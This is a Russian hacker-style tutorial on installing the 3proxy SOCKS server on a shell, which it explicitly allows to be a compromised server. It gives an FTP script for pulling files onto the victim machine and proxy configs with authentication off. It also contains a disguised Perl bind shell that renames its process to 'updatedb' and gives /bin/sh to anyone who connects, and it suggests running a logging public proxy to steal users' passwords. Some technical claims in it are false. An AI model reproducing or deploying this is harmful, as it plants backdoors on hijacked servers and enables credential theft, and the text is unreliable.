Ставим Socks своими руками
Вы наверно не раз сталкивались с необходимостью сделать своё пребывание в сети
анонимным. Вы наверное уже знаете что наиболее простым и дешевым способом
анонимизировать себя в сети является работа через прокси сервер/ы. И каждый
более-менее заботящийся о своей безопасности юзер работает через прокси.
Рассказывать что такое прокси и какие они бывают я не буду.
Ты юзаешь прокси? Уверен что да. А ты никогда не задумывался откуда они берутся и
для чего их создают а? Подумай сам, ведь прокси генерируют огромный траффик. Кому
нада за него платить? А вот кому. Большинство публичных прокси серверов
устанавливаются либо хакерами, либо спецслужбами для поимки первых. А поймать
хакера, заюзавшего КГБ'шный проксик очень просто. Допустим хакер взломал сервер
банка, выкачал интересующую его инфу, после чего админ заподозрил взлом, админ
покопался в логах нашел айпишник хакера (точнее айпишник проксика через который
работал хакер) и побежал премиком на Лубянку (предположим %). Сотрудники отдела "К"
проверили по своей базе этот самый IP и увидили что это айпишник ихнего проксика.
Теперь дело за малым, сотрудники ковыряют логии на сервере где установлен их
проксик. ВСЁ, ХАКЕР ПОД КОЛПАКОМ!
Мы рассмотрели первый вариант, теперь немного расскажу о втором.
Представь такую ситуацию. Я борзый падопак-хакер поставивший свой проксик, и конечно
я не забыл включить у своего проксика функцию ведения логов. После чего я щедро
оставляю свой проксик в паблике и наивные юзере пользуются ими. Наверное у тебя
возник вопрос: а нафига мне ему это нада, чё он будет делать с этими логами? Да всё
просто, весь трафик проходящий через мой проксик будет записываться в лог-файл. Ты
залогинился под своим паролем в аське, твой пароль записался в лог моего проксика
%).
Стрёмно получается да? Так вот чтоб с тобой не произошло ничего из вышеизложенного я
и написал эту стаью (признаюсь тема заеженна по потери пульса). Выход один- ставить
собственный проксик.
Я расскажу об установке наиболее популярного (популярного по праву) socks прокси
сервера под названием 3proxy от ЗАРАЗЫ. Рульность этого проксика заключается в том,
что его можно установить даже с nobody правами!
Итак начнём:
Нам понадобятся:
1. Руки прямые - 2 шт.
2. архвив 3proxy
3. Шелл.
Что такое шелл и как с ним работать я тоже не буду объяснять, не об этом моя статья.
3proxy можно скачать с офсайта www.security.nnov.ru/soft/3proxy . Шелл выбирать
тебе, либо это будет похаканный тобой серв, либо шелл на платном хостинге. Почему на
платном? Да потому что ни один бесплатный хостер не позволит тебе установить
проксик, проверял сам лично (хотя если найдшь такое чудо, незабудь поделиться со
мной ) Надеюсь о том как забидить шелл на уязвимой тачке рассказывать не нужно (но
всё таки если у тебя с этим проблемы, пиши, накатаю продолжение %).
Итак, ты на шелле. Качай архивчик с 3proxy и приступим к процессу установки (для
танкистов поясняю, скачать можно любым даунлоадером установленным на серве, если же
даунлоадера ты не нашел, заливай через FTP).
Как я уже говорил закачку файла можно произвести командой wget
http://site.ru/file.tar.gz . Но иногда можно столкнуться с отсутствием утилиты wget
на сервере. Но это не проблема, т.к. помимо wget существуют другие консольные
даунлоадеры, например curl и fetch. Работют с ними по тому же принципу что и с wget,
например ты нашел на серве curl, командуй: curl http://site.ru/file.tar.gz .
А что делать если на серванте вообще нет даунлоадера !? К сожалению бывает и такое.
Но вы ход есть всегда . Ведь если у тебя есть шелл, ты можешь залить файлы на него
через FTP. Вот как это реализовать:
Вообще если ты занимаешься сетевым взломом, то у тебя наверняка есть свой склад
сплойтов и прочего жобра на каком либо хостинге. Если же ты до сих пор не
зарегистрировал аккаунт на бесплатном хостинге, беги регистрировать, например на
http://www.newmail.ru/, имхо на этом хостинге нет антивирей и для хранения эксплойто
и другой лабуды он подходит лучше всего.
Итак ты зарегистрировал свой аккаунт на newmail.ru, тебе дали ящик и место под сайт
в придачю. Заливай на свой свежезареганный сайт 3proxy. Теперь собственно приведу
пример того, как закачать на шелл нужный нам сайт через FTP (всё что после # это мои
пояснения, их писать не нужно %):
Цитата|Quote
echo open ftp.newmail.ru 21>mpg # соеденяемся с FTP-сервом
echo yoursite.nm.ru>>mpg # здесь адрес твоего сайта
echo password>>mpg # пароль к твоему аккаунту
echo bin>>mpg # заходим на сайт (чёта такое, точно незнаю %)
echo get 3proxy.tar.gz >>mpg # сливаем с сайта архивчик с 3proxy
echo bye>>mpg # закрываем соединение
ftp -s:mpg
Итак скачаллось, теперь разархивируй архив. В папке с разархивированным проксиком
скомандуй make -f Makefile.unix и жди пока процесс компиляции модулей завершится.
Если ты всё сделаешь правильно (и если нормальный шелл), то появится один бинарник с
названием 3proxy. Всё. Ты собрал свой проксик, теперь его нужно отконфигурировать.
Создаём в той же папке где и бинарник 3proxy файл 3proxy.cfg .
Создал? Молодец, теперь вбиваем настройки, их немного.
Пиши в файле конфига следующее (всё что после # в конфиг добавлять ненужно, ето мои
коментарии %) :
Цитата|Quote
nserver 127.0.0.1 # адрес DNS для автоматического соединения
auth none # отключаем авторизацию =))
allow * # рашзрешение на использование проксика с любого
адреса.
socks -p7855 # номер порта нашего сокса.
internal 127.0.0.1 # внутренний IP
log /dev/null # сюда будут записываться логи. Не волнуйся сюда
можно только записывать
инфу, прочесть её невозможно .
Если ты всё набрал, нажми ctrl+c , конфиг запишется в ту директория в которой ты его
создавал.
Вот впринципе и всё по установке. Чтобы запустить собранный сокс скомандуй ./3proxy
3proxy.cfg .
Рассмотрим пример конфига, в котором мы установим авторизацию на нашем соксе:
Цитата|Quote
nserver 127.0.0.1 # адрес DNS для автоматического
users nick:CL:pass # создаём юзера с ником nick и паролем pass
auth strong # указываем необходимость авторизации !
allow * # рашзрешение на использование проксика с любого адреса.
socks -p7855 # номер порта нашего сокса.
internal 127.0.0.1 # внутренний IP
log /dev/null # сюда будут записываться логи. Не волнуйся сюда можно только
записывать инфу, прочесть её невозможно
В конфиге воявляется новая строчка users nick:CL:pass , этой строкой ты создаёшь
юзера (nick и pass конечно нужно поменять на свои %). Юзеров можно создать
несколько, делается это одинаково. И незабудь изменить строчку auth none на auth
strong !
Необходимо забиндить (тоесть открыть) порт для 3proxy.
Скрипт:
Цитата|Quote
#!/usr/bin/perl
$port = 32767;
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1){
accept(X, S);
unless(fork)
{ open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
} close X;}
Сохраняем код с файл с расширение .pl , например bind.pl
Заливаем его на шелл.
Выполняем на шелле команду perl bind.pl
После проделанных действий на шелле откроется 32767 порт.
Нам прийдётся подкорректировать в конфиге 3proxy порт, в строчке socks -p7855 меняем
с 7855 на 32767.
З.Ы. А ведь ты можешь помимо собственного использования заюзать socks в своих
мерзких делишках . Подумай сам, что тебе мешает создать отдельный проксик (как всё
умные мерзавци-хакеры и щедро раздавать его направо и налевло, незабыв при этом
указать для логов не дерикторию /dev/null , а в более подходящее для твоих гадких
делишек место .
Удачи...